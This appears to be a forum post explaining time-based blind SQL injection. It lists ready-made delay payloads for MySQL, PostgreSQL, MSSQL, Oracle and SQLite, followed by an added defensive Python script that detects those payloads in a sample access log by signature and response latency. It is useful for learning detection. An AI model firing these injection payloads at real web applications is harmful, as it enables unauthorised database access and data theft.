Blind SQL injection | Example

by Firefly21 - 09-11-2023 - 05:17 PM
The above technique focuses on measuring the load time of a web page after performing a SQL query. The goal is to determine whether an SQL injection has been successful by observing whether the SQL query has caused delays in loading the page. If the page takes longer to load after the SQL query, this could be an indication that a successful blind SQL injection has been performed.

MySQL (string concat and logical ops)
  • 1' + sleep(10)
  • 1' and sleep(10)
  • 1' && sleep (10)
  • 1' | sleep(10)
PostgreSQL (only supports string concat)
  • 1' || pg_sleep (10)
MSSQL
  • 1' WAITFOR DELAY '0:0:10'
ORACLE
  • 1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME])
  • 1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE ('ASD' , 10)
SQLite
  • 1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB ( [SLEEPTIME] 00000000/2))))
  • 1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB (1000000000/2))))
In some cases the sleep functions won't be allowed. Then, instead of using those functions you could make the query perform complex operations that will take several seconds.
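From the defender's side, the delay primitives listed above are easy to recognise in request logs, and the post's final point (heavy queries instead of sleep functions) is why response latency has to be checked as well. The following Python script is an added example, not code from Firefly21's post: it scans constructed access-log lines (the log format, the 5 s threshold and the sample IPs are assumptions) for the delay functions named above and cross-checks each hit against the recorded response time, so a payload that actually produced the delay is separated from one that was filtered or failed.

```python
import re
from urllib.parse import unquote_plus

# One regex per DBMS family for the delay primitives listed in the post.
# Matched case-insensitively against the URL-decoded request path.
TIME_DELAY_SIGNATURES = {
    "mysql_sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "postgres_pg_sleep": re.compile(r"\bpg_sleep\s*\(\s*\d+\s*\)", re.I),
    "mssql_waitfor": re.compile(r"\bwaitfor\s+delay\s+'[\d:.]+'", re.I),
    "oracle_dbms_pipe": re.compile(r"\bdbms_pipe\.receive_message\s*\(", re.I),
    "sqlite_randomblob": re.compile(r"\brandomblob\s*\(\s*\d+", re.I),
}

# Assumed log shape: client - - [time] "METHOD path HTTP/x" status bytes duration_ms
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<duration_ms>\d+)$'
)

# Constructed sample log (not captured from any real system). Line 4 is a benign
# request containing the substring "sleep"; line 6 is a slow request with no payload.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Nov/2023:17:10:01 +0000] "GET /item?id=1 HTTP/1.1" 200 512 38
203.0.113.7 - - [09/Nov/2023:17:10:04 +0000] "GET /item?id=1%27+and+sleep(10)--+ HTTP/1.1" 200 512 10042
203.0.113.7 - - [09/Nov/2023:17:10:20 +0000] "GET /item?id=1%27%20%7C%7C%20pg_sleep%20(10)-- HTTP/1.1" 200 512 10011
198.51.100.4 - - [09/Nov/2023:17:11:02 +0000] "GET /search?q=sleepy+cat HTTP/1.1" 200 2048 55
203.0.113.7 - - [09/Nov/2023:17:11:30 +0000] "GET /item?id=1%27%20WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1" 500 0 10090
198.51.100.9 - - [09/Nov/2023:17:12:00 +0000] "GET /report?year=2023 HTTP/1.1" 200 90112 6200
"""


def analyse_log(log_text, slow_ms=5000):
    """Return one finding per suspicious line.

    verdict is "delay_confirmed" when a delay signature is present and the
    response really was slow (the evidence a time-based blind injection relies
    on), "signature_only" when the payload was seen but produced no delay, and
    "slow_no_signature" for slow responses without a known primitive, which is
    the only signal left when the attacker uses heavy queries instead of sleep.
    """
    findings = []
    for raw in log_text.splitlines():
        m = LOG_LINE.match(raw)
        if not m:
            continue  # skip lines that do not fit the assumed format
        decoded = unquote_plus(m["path"])  # single URL-decoding pass
        hits = [name for name, rx in TIME_DELAY_SIGNATURES.items() if rx.search(decoded)]
        duration = int(m["duration_ms"])
        slow = duration >= slow_ms
        if not hits and not slow:
            continue
        if hits and slow:
            verdict = "delay_confirmed"
        elif hits:
            verdict = "signature_only"
        else:
            verdict = "slow_no_signature"
        findings.append({
            "client": m["client"],
            "path": decoded,
            "signatures": hits,
            "duration_ms": duration,
            "verdict": verdict,
        })
    return findings


def summarise_by_client(findings):
    """Count confirmed time-based probes per client address."""
    counts = {}
    for f in findings:
        if f["verdict"] == "delay_confirmed":
            counts[f["client"]] = counts.get(f["client"], 0) + 1
    return counts


if __name__ == "__main__":
    results = analyse_log(SAMPLE_LOG)
    for r in results:
        print(r["verdict"], r["client"], r["duration_ms"], r["signatures"], r["path"])
    print(summarise_by_client(results))
```

The signature list catches the functions from the post regardless of spacing or URL encoding (a single decoding pass is assumed; doubly-encoded parameters would need another `unquote_plus`), while the latency check is what distinguishes a real delay from a blocked attempt and is the only indicator that survives when sleep functions are unavailable and the attacker falls back to expensive queries.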